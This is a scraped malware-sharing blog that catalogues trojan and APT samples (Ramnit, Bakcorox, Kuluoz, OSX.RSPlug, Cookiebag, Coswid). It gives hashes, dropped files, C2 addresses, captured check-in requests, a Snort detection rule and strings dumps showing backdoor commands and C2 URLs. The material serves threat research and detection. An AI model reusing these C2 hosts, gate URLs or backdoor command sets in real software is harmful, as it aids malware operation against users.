Quantcast
Channel: contagio malware exchange
Viewing all 79 articles
Browse latest View live

020 Crime Ramnit Rootkit - web -May, 10 2012

May 10, 2012, 5:23 am
$
0
0

Sample credit - Artem Baranov and Hendrik Adrian

Research:

 
Download (pass infected)


Size: 135680
MD5:  607B2219FBCFBFE8E6AC9D7F3FB8D50E



AppData\ftaubilx\px1.tmp
AppData\obrymkdk.log
%tmp%\bledqixd.sys MD5: a6d351093f75d16c574db31cdf736153


ffmcnnwunntybhyx.exe
info.exe
narhllul.exe 

Communications
443 to 176.31.62.76

 Virustotal

SHA256:     f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c
SHA1:     a7771cd3b99f7201b331323f03e2d596778b610e
MD5:     607b2219fbcfbfe8e6ac9d7f3fb8d50e
File size:     132.5 KB ( 135680 bytes )
File name:     file
File type:     Win32 EXE
Tags:     upx
Detection ratio:     37 / 42
Analysis date:     2012-04-27 11:02:44 UTC ( 1 week, 6 days ago )
1
3
More details
Antivirus     Result     Update
AhnLab-V3     Trojan/Win32.Lebag     20120426
AntiVir     TR/Offend.KD.504269     20120427
Antiy-AVL     Trojan/Win32.Gamarue.gen     20120427
Avast     Win32:Trojan-gen     20120427
AVG     Generic27.MBL     20120427
BitDefender     Trojan.Generic.KD.504269     20120427
ByteHero     -     20120424
CAT-QuickHeal     Trojan.Lebag.klg.cw3     20120427
ClamAV     Trojan.CripUnp     20120426
Commtouch     W32/Downldr2.IXID     20120427
Comodo     Heur.Suspicious     20120427
DrWeb     Trojan.Rmnet.8     20120427
Emsisoft     DDoS.Win32.Dofoil!IK     20120427
eSafe     -     20120425
eTrust-Vet     Win32/Dofoil.A!generic     20120427
F-Prot     W32/Downldr2.IXID     20120426
F-Secure     Trojan.Generic.KD.504269     20120427
Fortinet     W32/Lebag.A!tr     20120427
GData     Trojan.Generic.KD.504269     20120427
Ikarus     DDoS.Win32.Dofoil     20120427
Jiangmin     Trojan/Gamarue.bx     20120427
K7AntiVirus     Riskware     20120427
Kaspersky     Trojan.Win32.Lebag.klg     20120427
McAfee     Generic.il     20120427
McAfee-GW-Edition     Generic.il     20120426
Microsoft     Trojan:Win32/Ramnit.A     20120427
NOD32     Win32/Ramnit.A     20120427
Norman     W32/Krypt.CI     20120427
nProtect     Trojan/W32.Agent.135680.LI     20120427
Panda     Trj/Agent.NOK     20120427
PCTools     Trojan.Generic     20120424
Rising     Trojan.Win32.Generic.12AF6823     20120427
Sophos     -     20120427
SUPERAntiSpyware     -     20120402
Symantec     Trojan Horse     20120427
TheHacker     Trojan/Lebag.klg     20120426
TrendMicro     TSPY_SINOWAL.WC     20120427
TrendMicro-HouseCall     TSPY_SINOWAL.WC     20120427
VBA32     Trojan.Lebag.klg     20120427
VIPRE     Trojan.Win32.Generic!BT     20120427
ViRobot     -     20120427
VirusBuster     Trojan.Lebag!yEp9NXlqXHc     20120427

    * Comments
    * Votes
    * Additional information

No comments
Also found on BH EK 173.237.198.42
Posted 3 months, 3 weeks ago by Kafeine
BH EK 77.72.129.68
Posted 3 months, 3 weeks ago by Kafeine
This is one of the the Ramnit Worm Malware detected between 1st January 2012 to 6th January 2012

Analyzed in the below written analysis reports:





Binary Analysis: http://mcaf.ee/r6qb5 (Translated from Japanese)

Dynamic Analysis (1) & (2) : http://mcaf.ee/7y46s & http://mcaf.ee/cf0jw (Translated from Japanese)

Overall Latest samples & Analysis: http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html#more



Hendrik ADRIAN (VT/Twitter: @unixfreaxjp )

ZeroDay Japan http://0day.jp

Blog: unixfreaxjp.blogspot.com
Posted 3 months, 3 weeks ago by unixfreaxjp
Below is the current reports:

The static (binary) analysis first handle report is here:
 http://pastebin.com/iNxP8GTR

The dynamic (behavior)) analysis first handle report is here:
 http://pastebin.com/JJ5zuTh1


Last notes:
Received same sample as per sent by contagio.
It sent the encrypted packet to remote, non-SSL by port 443. Decrypting it in many ways.. still can't tell
Encrypt key suspected to be injected in registry, in dynamic analysis line 228. (windows registry)
outbound links goes into zynkhole, pls check if any left.
I am Ollying the sample for more info now..
Search

021 Crime TDL - web - June 4, 2012

June 4, 2012, 1:39 pm

022 Crime Win32/Bakcorox.A - proxy bot - web - June 7, 2012

June 7, 2012, 8:14 am
$
0
0

 Download (pass infected)


pcap file



DNS query:  day7read.info
DNS response:  day7read.info ⇒ 74.207.249.7
Connects to:  day7read.info:443 (74.207.249.7)
Sends data to:  8.8.8.8:53
Sends data to:  day7read.info:443 (74.207.249.7)
Receives data from :  8.8.8.8:53
Receives data from:  day7read.info:443 (74.207.249.7)
 
 Traffic
GET favicon.ico HTTP/1.1
Host: bcProxyBot.com
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg
Accept-Language: en-us
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.2.0)
Cookie: 0800277B8CC8admin-0b1297ec9

........
SHA256:     edcfde456995f0d5804e5842a460c72d8a806d0f1b76cfdbea4cc414823c57e3
SHA1:     91c4147f6b62ef5e08bc08ee6788282cb7745afc
MD5:     ff705b746d30a8ba3cab5837cc58c3f7
File size:     14.0 KB ( 14336 bytes )
File name:     FF705B746D30A8BA3CAB5837CC58C3F7
File type:     Win32 EXE
Tags:     armadillo
Detection ratio:     29 / 40
Analysis date:     2012-04-30 20:20:32 UTC ( 1 month, 1 week ago )
0
0
More details
Antivirus     Result     Update
AhnLab-V3     Trojan/Win32.Hupigon     20120430
AntiVir     TR/Dldr.Flexty.A.32     20120430
Antiy-AVL     Trojan/Win32.Coco.gen     20120430
Avast     Win32:Bakcorox [Trj]     20120430
AVG     BackDoor.Generic15.EEP     20120430
BitDefender     Gen:Variant.Zusy.Elzob.1921     20120430
ByteHero     -     20120424
CAT-QuickHeal     TrojanProxy.Coco.r     20120430
ClamAV     -     20120430
Commtouch     -     20120430
Comodo     UnclassifiedMalware     20120430
DrWeb     Trojan.Proxy.23500     20120430
Emsisoft     Trojan-Downloader.Win32.Flexty!IK     20120430
eSafe     Win32.TRDldr.Flexty     20120430
eTrust-Vet     -     20120430
F-Prot     -     20120430
F-Secure     Gen:Variant.Zusy.Elzob.1921     20120430
Fortinet     W32/Coco.E!tr     20120430
GData     Gen:Variant.Zusy.Elzob.1921     20120430
Ikarus     Trojan-Downloader.Win32.Flexty     20120430
Jiangmin     TrojanProxy.Coco.m     20120430
K7AntiVirus     Proxy-Program     20120430
Kaspersky     Trojan-Proxy.Win32.Coco.r     20120430
Microsoft     TrojanDownloader:Win32/Flexty.A     20120430
NOD32     probably a variant of Win32/TrojanProxy.Bakcorox.A     20120430
Norman     W32/Proxy.AA     20120430
nProtect     -     20120430
Panda     Generic Trojan     20120430
PCTools     -     20120430
Symantec     Backdoor.Trojan     20120430
TheHacker     Trojan/Proxy.Coco.r     20120428
TrendMicro     TROJ_GEN.R47CCCJ     20120430
TrendMicro-HouseCall     TROJ_GEN.R47CCCJ     20120429
VBA32     TrojanProxy.Coco.r     20120430
VIPRE     Trojan-Downloader.Win32.Flexty.a (v)     20120430
ViRobot     -     20120430
VirusBuster     Trojan.PR.Coco!FNKo1kplNQ4     20120430

    Comments
    Votes
    Additional information

ssdeep
384:6qg+/QsTq1PELRURctEb+hq9LuIYAAMBk1OFs:/3mZELSuA+ILt4OF
TrID
Win32 Dynamic Link Library (generic) (65.4%)
Generic Win/DOS Executable (17.2%)
DOS Executable Generic (17.2%)
Autodesk FLIC Image File (extensions: flc, fli, cel) (0.0%)
PEiD packer identifier
Armadillo v1.71
ExifTool

MIMEType.................: application/octet-stream
Subsystem................: Windows GUI
MachineType..............: Intel 386 or later, and compatibles
TimeStamp................: 2012:03:10 18:22:38+01:00
FileType.................: Win32 EXE
PEType...................: PE32
CodeSize.................: 9216
LinkerVersion............: 10.0
EntryPoint...............: 0x3151
InitializedDataSize......: 4096
SubsystemVersion.........: 5.1
ImageVersion.............: 0.0
OSVersion................: 5.1
UninitializedDataSize....: 0

Portable Executable structural information

Compilation timedatestamp.....: 2012-03-10 17:22:38
Target machine................: 0x14C (Intel 386 or later processors and compatible processors)
Entry point address...........: 0x00003151

PE Sections...................:

Name        Virtual Address  Virtual Size  Raw Size  Entropy  MD5
.text                  4096          9014      9216     6.21  2012cebb7ee205fd627a5fe9e602516f
.rdata                16384          1510      1536     4.70  fa78d5393417f7bc7f38042f77199c10
.data                 20480          1172      1536     5.20  18d9f243bc24f2f360a24bb5124cc565
.reloc                24576           808      1024     4.72  ca9a78f5f11bcc7c89a0fd94d13a70f3

PE Imports....................:

IPHLPAPI.DLL
    GetIfTable

ADVAPI32.dll
    RegisterServiceCtrlHandlerW, SetServiceStatus, StartServiceCtrlDispatcherW

KERNEL32.dll
    CreateEventW, GetTickCount, GetTempPathA, SetEvent, WaitForSingleObject, CreateThread, CloseHandle, GetModuleFileNameA, GetModuleHandleA, GetStartupInfoA, Sleep

MSVCRT.dll
    fopen, fwrite, fclose, _errno, _exit, strstr, exit, _acmdln, __getmainargs, _initterm, __setusermatherr, _adjust_fdiv, __p__commode, __p__fmode, __set_app_type, _except_handler3, _controlfp, memcpy, atoi, isspace, strchr, strncmp, malloc, free, sprintf, _XcptFilter, memset

SHELL32.dll
    ShellExecuteA

WS2_32.dll
    -, -, -, -, -, -, -, -, -, -, -


PE Exports....................:

strdup

First seen by VirusTotal
2012-03-18 20:22:11 UTC ( 2 months, 2 weeks ago )
Last seen by VirusTotal
2012-04-30 20:20:32 UTC ( 1 month, 1 week ago )
File names (max. 25)

    ff705b746d30a8ba3cab5837cc58c3f7.exe
    FF705B746D30A8BA3CAB5837CC58C3F7

023 Crime Downloader Trojan (name?) - web - June 7, 2012

June 7, 2012, 9:23 am
$
0
0
Audio_Recording_MP3
MD5: FDC170166CB958E138E7D401F3C6F896
SHA256: A3253B1732A50146038A68B3B46260F80BEC6C1C

 Download (pass infected)

pcap file






Audio_Recording_MP3.exe
Creates: c:\Documents and Settings\Administrator\Local Settings\Application Data\blbljsqp.exe  (file name random)
Value changes: HKCU\software\microsoft\windows\currentversion\explorer\shell folders[local appdata]

 GET /gley/index.php?r=gate&id=e81b9088&group=30.05.2012&debug=0 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: krasguatanany.ru

HTTP/1.1 404 Not Found
Server: nginx/1.1.19
Date: Thu, 07 Jun 2012 16:09:56 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 294
Connection: keep-alive
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /gley/index.php was not found on this server.</p>
<hr>
<address>Apache/2.2.16 (Debian) Server at krasguatanany.ru Port 80</address>
</body></html>



ET signature discussion

Nathan Fowler | 8 May 17:45
Re: Create Signatures

On 05/08/12 09:40, Phil Robinson wrote:
> hxxp://bing[.]com/afyu/index.php?r=gate&id=[N]&group=[D]&debug=0
> hxxp://twitter[.]com/nygul/index.php?r=gate&ac=[N]&group=[D]&debug=0
> hxxp://fb[.]com/dwrgh/index.php?r=gate&fg=[N]&group=[D]&debug=0
> hxxp://google[.]com/efwgh/index.php?r=gate&cc=[N]&group=[D]&debug=0
> hxxp://everkosmo2012[.]ru/ab/index.php?r=gate&id=[N]&group=[D]&debug=0
>
> I was unable to find any exiting signatures. Can someone help? Thanks.....

Looks like here's an example,

http:// everkosmo2012.ru/ab/index.php?r=gate&id=00cd1a40&group=20.04.2012&debug=0

Not sure what this is called though,

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN -
Check-in Not sure what this is called"; flow:established,to_server;
content:".php?r=gate"; http_uri; fast_pattern; content:"&group=";
http_uri; distance:0; content:"&debug="; http_uri; distance:0;
classtype:trojan-activity; sid:x; rev:1;)

https://www.virustotal.com/file/1c464848df9a803f01035dacf70888a9d942e42ed44e071443a9742930a23dd4/analysis/

SHA256:1c464848df9a803f01035dacf70888a9d942e42ed44e071443a9742930a23dd4
SHA1:a3253b1732a50146038a68b3b46260f80bec6c1c
MD5:fdc170166cb958e138e7d401f3c6f896
File size:53.0 KB ( 54272 bytes )
File name:1338806789.Audio_Recording_MP3-itYk.exe
File type:Win32 EXE
Detection ratio:24 / 41
Analysis date:2012-06-04 10:46:37 UTC ( 3 days, 5 hours ago )

0
2
More details
AntivirusResultUpdate
AhnLab-V3Win-Trojan/Kuluoz.5427220120604
AntiVirTR/Crypt.XPACK.Gen20120604
Antiy-AVL-20120604
AvastWin32:Dropper-gen [Drp]20120604
AVGDownloader.Generic12.CFBJ20120604
BitDefenderTrojan.Generic.KDV.63738120120604
ByteHero-20120531
CAT-QuickHeal-20120604
ClamAV-20120602
Commtouch-20120604
Comodo-20120604
DrWebTrojan.MulDrop3.5189320120604
EmsisoftTrojan-Downloader.Win32.Dapato!IK20120604
eSafe-20120603
F-Prot-20120603
F-SecureTrojan.Generic.KDV.63738120120604
FortinetW32/Dapato.LON!tr.dldr20120603
IkarusTrojan-Downloader.Win32.Dapato20120604
Jiangmin-20120604
K7AntiVirus-20120601
KasperskyTrojan-Downloader.Win32.Dapato.lon20120604
McAfeeGeneric Downloader.z20120604
McAfee-GW-EditionGeneric Downloader.z20120604
MicrosoftTrojanDownloader:Win32/Kuluoz.B20120602
NOD32Win32/TrojanDownloader.Zortob.B20120604
NormanW32/Troj_Generic.BZPCE20120603
nProtectTrojan.Generic.KDV.63738120120604
PandaTrj/CI.A20120603
PCToolsTrojan.Gen20120604
Rising-20120604
SophosTroj/Agent-WGO20120604
SUPERAntiSpyware-20120602
SymantecTrojan.Gen20120604
TheHacker-20120531
TotalDefense-20120604
TrendMicroTROJ_KRYPTIK.XCV20120604
TrendMicro-HouseCallTROJ_KRYPTIK.XCV20120604
VBA32-20120604
VIPRETrojan.Win32.Generic!BT20120604
ViRobot-20120604
VirusBuster

023 Crime OSX DNS Changer / OSX.RSPlug.A - web -2007

June 25, 2012, 6:37 pm
$
0
0

SHA256:2bdcdab0a5d41f4b6aa48e2ab55177552c8419c3f8ce140c4850a0616d7a2f3e
SHA1:f620af9a43d6e46e6b028dc8b109ff5d4cced911
MD5:5291beb71cba2c5779119bff7a10abdb
File size:16.6 KB ( 17034 bytes )
File name:ultracodec1237.dmg



 Download (pass infected)


  https://www.virustotal.com/file/2bdcdab0a5d41f4b6aa48e2ab55177552c8419c3f8ce140c4850a0616d7a2f3e/analysis/
SHA256:2bdcdab0a5d41f4b6aa48e2ab55177552c8419c3f8ce140c4850a0616d7a2f3e
SHA1:f620af9a43d6e46e6b028dc8b109ff5d4cced911
MD5:5291beb71cba2c5779119bff7a10abdb
File size:16.6 KB ( 17034 bytes )
File name:ultracodec1237.dmg
File type:unknown
Detection ratio:21 / 42
Analysis date: 2012-06-18 00:32:46 UTC ( 1 week, 1 day ago ) 
AntiVirMACOS/Puper.A20120617
AvastOther:Malware-gen [Trj]20120617
DrWebMac.DnsChange20120618
EmsisoftTrojan.Mac.Dnscha.dmg!IK20120618
FortinetMalware_fam.B20120617
GDataOther:Malware-gen20120618
IkarusTrojan.Mac.Dnscha.dmg20120617
K7AntiVirusTrojan20120615
KasperskyTrojan.Mac.Dnscha.dmg20120618
McAfeeOSX/Puper20120618
McAfee-GW-EditionOSX/Puper20120617
MicrosoftTrojan:MacOS/RSPlug.A20120617
NOD32probably a variant of Win32/Agent.MSSTEQQ20120617
NormanRSPlug.A20120617
PCToolsMalware.OSX-RSPlug20120618
RisingTrojan.Mac.Dnscha.c20120614
SophosOSX/RSPlug-A20120617
SUPERAntiSpyware-20120617
SymantecOSX.RSPlug.A20120617
TrendMicroOSX_DNSCHAN.A20120618
TrendMicro-HouseCallOSX_DNSCHAN.A20120617
VBA32Trojan.Mac.Dnscha.dmg20120615

Additional information
No comments



COOKIES Cookiebag Dalbot strings - APT (1)

August 12, 2013, 5:05 am
$
0
0
File: COOKIEBAG_sample_0C28AD34F90950BC784339EC9F50D288
MD5:  0c28ad34f90950bc784339ec9f50d288
Size: 151552






Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
RichW
.text
`.rdata
@.data
----------------------snip
tAVW
string too long
invalid string position
Unknown exception
 (8PX
700WP
`h````
ppxxxx
(null)
GAIsProcessorFeaturePresent
KERNEL32
e+000
__GLOBAL_HEAP_SELECTED
__MSVCRT_HEAP_SELECT
runtime error
TLOSS error
SING error
DOMAIN error
R6028
- unable to initialize heap
R6027
- not enough space for lowio initialization
R6026
- not enough space for stdio initialization
R6025
- pure virtual function call
R6024
- not enough space for _onexit/atexit table
R6019
- unable to open console device
R6018
- unexpected heap error
R6017
- unexpected multithread lock error
R6016
- not enough space for thread data
abnormal program termination
R6009
- not enough space for environment
R6008
- not enough space for arguments
R6002
- floating point not loaded
Microsoft Visual C++ Runtime Library
Runtime Error!
Program:
<program name unknown>
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
GetLastActivePopup
GetActiveWindow
MessageBoxA
user32.dll
1#QNAN
1#INF
1#IND
1#SNAN
CreateProcessA
Sleep
CloseHandle
TerminateProcess
WriteFile
GetPrivateProfileStringA
WritePrivateProfileStringA
CreateThread
GetStartupInfoA
CreatePipe
ReadFile
WideCharToMultiByte
MultiByteToWideChar
GetModuleFileNameA
GetLastError
KERNEL32.dll
InternetOpenW
InternetCloseHandle
InternetSetOptionW
InternetCrackUrlW
InternetConnectW
HttpOpenRequestW
HttpAddRequestHeadersW
InternetSetCookieW
HttpSendRequestExW
InternetWriteFile
HttpEndRequestA
HttpQueryInfoW
InternetQueryDataAvailable
InternetReadFile
WININET.dll
WS2_32.dll
RtlUnwind
ExitProcess
GetCurrentProcess
GetTimeZoneInformation
GetSystemTime
GetLocalTime
GetCommandLineA
GetVersion
HeapFree
RaiseException
HeapAlloc
SetFilePointer
HeapReAlloc
HeapSize
GetCPInfo
GetACP
GetOEMCP
GetProcAddress
GetModuleHandleA
UnhandledExceptionFilter
FreeEnvironmentStringsA
FreeEnvironmentStringsW
GetEnvironmentStrings
GetEnvironmentStringsW
SetHandleCount
GetStdHandle
GetFileType
GetEnvironmentVariableA
GetVersionExA
HeapDestroy
HeapCreate
VirtualFree
VirtualAlloc
IsBadWritePtr
SetUnhandledExceptionFilter
IsBadReadPtr
IsBadCodePtr
GetStringTypeA
GetStringTypeW
SetStdHandle
FlushFileBuffers
CreateFileA
CompareStringA
CompareStringW
SetEnvironmentVariableA
LCMapStringA
LCMapStringW
CreateFileW
LoadLibraryA
SetEndOfFile
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
http://66.170.3.43:8080/CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCC
geturl:
 perform exe success!
 perform exe failure!
performexe:
interval:
breakpointtrans
sleep:
exit
quit
content=
download
reqpath=
savepath=
upfile
command=
Reqfile not exist!
 upfile over!
.exe
no file!
download file failure!
 download over!
&FILECONTENT=
FILENAME=
ready download file !
FilePath
Circle
f.ini
File
DDDDD
Set-Cookie:
the url no respon!
 start Cmd Failure!
CreatePipe(echo) failed!!!
CreatePipe(cmd) failed!!!
YzpcXHdpbmRvd3NcXHN5c3RlbTMyXFxjbWQuZXhl
Notepad.exe
Y21kLmV4ZQ==
path
Hello World!
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Location:
Content-Length:
charset=
.?AVexception@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVtype_info@@
kU'9
HMXB
?Zd;
?/L[
S;uD
z?aUY
D?$?
U>c{
zc%C1
.:3q
-64OS
NKeb

Unicode Strings:
---------------------------------------------------------------------------
jjjj
jjjj
(null)
hostname
clientkey
reqfilepath
command
reqfile
.html
?ID=
postvalue
postfile
.asp
POST
aaaaaaa
postdata
C:\unknow.zip
Content-Length
Set Proxy Failure!
BMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
</html>
<html>
utf-8
         (((((                  H

COOKIES Cookiebag Dalbot strings - APT (2)

August 12, 2013, 5:07 am
$
0
0
File: COOKIEBAG_sample_543E03CC5872E9ED870B2D64363F518B
MD5:  543e03cc5872e9ed870b2d64363f518b
Size: 126976






Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
Rich#
.text
`.rdata
@.data
---------------------------snip
string too long
invalid string position
Unknown exception
 (8PX
700WP
`h````
ppxxxx
(null)
GAIsProcessorFeaturePresent
KERNEL32
e+000
__GLOBAL_HEAP_SELECTED
__MSVCRT_HEAP_SELECT
runtime error
TLOSS error
SING error
DOMAIN error
R6028
- unable to initialize heap
R6027
- not enough space for lowio initialization
R6026
- not enough space for stdio initialization
R6025
- pure virtual function call
R6024
- not enough space for _onexit/atexit table
R6019
- unable to open console device
R6018
- unexpected heap error
R6017
- unexpected multithread lock error
R6016
- not enough space for thread data
abnormal program termination
R6009
- not enough space for environment
R6008
- not enough space for arguments
R6002
- floating point not loaded
Microsoft Visual C++ Runtime Library
Runtime Error!
Program:
<program name unknown>
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
GetLastActivePopup
GetActiveWindow
MessageBoxA
user32.dll
1#QNAN
1#INF
1#IND
1#SNAN
Sleep
CreateThread
CloseHandle
GetProcAddress
LoadLibraryA
GetStartupInfoA
CreatePipe
ReadFile
TerminateProcess
WriteFile
GetModuleFileNameA
GetShortPathNameA
MultiByteToWideChar
GetLastError
WideCharToMultiByte
KERNEL32.dll
InternetSetCookieW
InternetOpenW
InternetCloseHandle
InternetSetOptionW
InternetCrackUrlW
InternetConnectW
HttpOpenRequestW
HttpAddRequestHeadersW
HttpSendRequestExW
InternetWriteFile
HttpEndRequestA
HttpQueryInfoW
InternetQueryDataAvailable
InternetReadFile
WININET.dll
WS2_32.dll
RtlUnwind
ExitProcess
GetCurrentProcess
GetTimeZoneInformation
GetSystemTime
GetLocalTime
GetCommandLineA
GetVersion
HeapFree
RaiseException
HeapAlloc
SetFilePointer
GetCPInfo
GetACP
GetOEMCP
HeapReAlloc
HeapSize
GetModuleHandleA
UnhandledExceptionFilter
FreeEnvironmentStringsA
FreeEnvironmentStringsW
GetEnvironmentStrings
GetEnvironmentStringsW
SetHandleCount
GetStdHandle
GetFileType
GetEnvironmentVariableA
GetVersionExA
HeapDestroy
HeapCreate
VirtualFree
VirtualAlloc
IsBadWritePtr
SetUnhandledExceptionFilter
IsBadReadPtr
IsBadCodePtr
GetStringTypeA
GetStringTypeW
SetStdHandle
FlushFileBuffers
CreateFileA
LCMapStringA
LCMapStringW
CompareStringA
CompareStringW
SetEnvironmentVariableA
CreateFileW
SetEndOfFile
http://66.228.132.53:80/EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
C:\unknow.zip
Content-Length
Content-Type
application/x-www-form-urlencoded
GGGGG
command
qwert
.asp
sleep:
exit
quit
content=
download
reqpath=
savepath=
upfile
command=
 start Cmd Failure!
Q3JlYXRlUHJvY2Vzc0E=
kernel32.dll
CreatePipe(echo) failed!!!
CreatePipe(cmd) failed!!!
no file!
download file failure!
 download over!
&FILECONTENT=
FILENAME=
Reqfile not exist!
 upfile over!
reqfilepath
reqfile
.html
?ID=
postvalue
postdata
postfile
hostname
clientkey
EEEEE
YzpcXHdpbmRvd3NcXHN5c3RlbTMyXFxjbWQuZXhl
word.exe
Y21kLmV4ZQ==
path
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Software\Microsoft\Windows NT\CurrentVersion\Windows
load
.?AVexception@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVtype_info@@
kU'9
HMXB
?Zd;
?/L[
S;uD
z?aUY
D?$?
U>c{
zc%C1
.:3q
-64OS
NKeb

Unicode Strings:
---------------------------------------------------------------------------
jjjj
jjjj
(null)
POST
AMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
</html>
<html>
utf-8
; expires=Thu, 01-Jan-1970 00:00:01 GMT
         (((((                  H

Coswid strings - APT

August 12, 2013, 5:10 am
$
0
0
File: D62CD4AD2A919B6ACFA6D49D446DFFDB_svchost.exe_
MD5:  d62cd4ad2a919b6acfa6d49d446dffdb
Size: 19968

see md5 other below




Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
cRich
.text
`.rdata
@.data
PhT@D
hT@D
Qh$q@
hT@D
hTDD
hXDD
h,q@
Qh8q@
h<q@
t$j/
h@q@
hHq@
hLq@
h\q@
hT@D
hdDD
hhDD
h$p@
hdp@
%``@
%d`@
%p`@
%x`@
hSVW
5lDD
>"u:F
XPVSS
%H`@
%D`@
Sleep
GetShortPathNameA
GetModuleFileNameA
GetProcAddress
LoadLibraryA
GetLongPathNameA
GetTempPathA
lstrlenA
KERNEL32.dll
WS2_32.dll
RegCloseKey
RegSetValueExA
RegCreateKeyA
RegOpenKeyA
ADVAPI32.dll
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
InternetCloseHandle
InternetConnectA
InternetOpenA
WININET.dll
atoi
strcat
strcpy
fclose
fflush
??3@YAXPAX@Z
fwrite
memset
fopen
strrchr
??2@YAPAXI@Z
atol
sscanf
_purecall
strlen
MSVCRT.dll
_exit
_XcptFilter
exit
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp
GetModuleHandleA
GetStartupInfoA
rijndael
.update.sektori.org
/update.png
cXVpdA==
Y21k
c2xlZXA=
dW5zdXBwb3J0
Y29ubmVjdA==
+Mozilla/4.0 (compatible; MSIE 8.0; Win32)
%s %s
HTTP/1.1
.exe
kernel32.dll
CreateProcessA
1234567890123456
HTTP/1.1
Software\Microsoft\Windows NT\CurrentVersion\Windows
load

Unicode Strings:
---------------------------------------------------------------------------
jjjj
jjjj
jjjjjjj
jjjj
jjjj

================
File: A4BA6540520C375875BF46CF8E19CB7D
MD5:  a4ba6540520c375875bf46cf8e19cb7d
Size: 19968

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
cRich
.text
`.rdata
@.data
PhT@D
hT@D
Qh$q@
hT@D
hTDD
hXDD
h,q@
Qh8q@
h<q@
t$j/
h@q@
hHq@
hLq@
h\q@
hT@D
hdDD
hhDD
h$p@
hdp@
%``@
%d`@
%p`@
%x`@
hSVW
5lDD
>"u:F
XPVSS
%H`@
%D`@
Sleep
GetShortPathNameA
GetModuleFileNameA
GetProcAddress
LoadLibraryA
GetLongPathNameA
GetTempPathA
lstrlenA
KERNEL32.dll
WS2_32.dll
RegCloseKey
RegSetValueExA
RegCreateKeyA
RegOpenKeyA
ADVAPI32.dll
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
InternetCloseHandle
InternetConnectA
InternetOpenA
WININET.dll
atoi
strcat
strcpy
fclose
fflush
??3@YAXPAX@Z
fwrite
memset
fopen
strrchr
??2@YAPAXI@Z
atol
sscanf
_purecall
strlen
MSVCRT.dll
_exit
_XcptFilter
exit
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp
GetModuleHandleA
GetStartupInfoA
rijndael
.release.pornandpot.com
/google.png
cXVpdA==
Y21k
c2xlZXA=
dW5zdXBwb3J0
Y29ubmVjdA==
+Mozilla/4.0 (compatible; MSIE 8.0; Win32)
%s %s
HTTP/1.1
.exe
kernel32.dll
CreateProcessA
1234567890123456
HTTP/1.1
Software\Microsoft\Windows NT\CurrentVersion\Windows
load

Unicode Strings:
---------------------------------------------------------------------------
jjjj
jjjj
jjjjjjj
jjjj
jjjj

=======================

File: 06CD694D383E4951E274878B975B5785
MD5:  06cd694d383e4951e274878b975b5785
Size: 154624

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
RichP
.text
`.rdata
@.data
.rsrc
5 `@
L$tj
Qhdp@
hXp@
hPp@
T$|h8p@
hPp@
h4p@
h4p@
h0p@
h0p@
D$@D
_^]3
D$<SUVWh
L$Lh
T$PQR
5@`@
=<`@
58`@
-0`@
T$Hj@R
D$Hj
L$Lj
_^]3
hH+@
XSVW
_WPS
HHtpHHtl
^h p@
YYh(p@
h$p@
5Dq@
5Dq@
5Dq@
<"u%
F<"t
t9UW
?=t"U
QQS3
PSSW
8"uD
8"uF@
8"u,
@@f9
@@f9
SS@SSPVSS
t#SSUP
t$$VSS
_^][YY
DSUVWh
_^][
8MZu
t>j,P
Yt0@
SVWUj
hh*@
]_^[
hp*@
t.;t$$t(
VC20XC00U
SVWU
tEVU
t3x<
]_^[
hhd@
hdd@
h<d@
VWss
Yu!j
=xt@
Vt6P
Yt4^
Y;5,
90tr
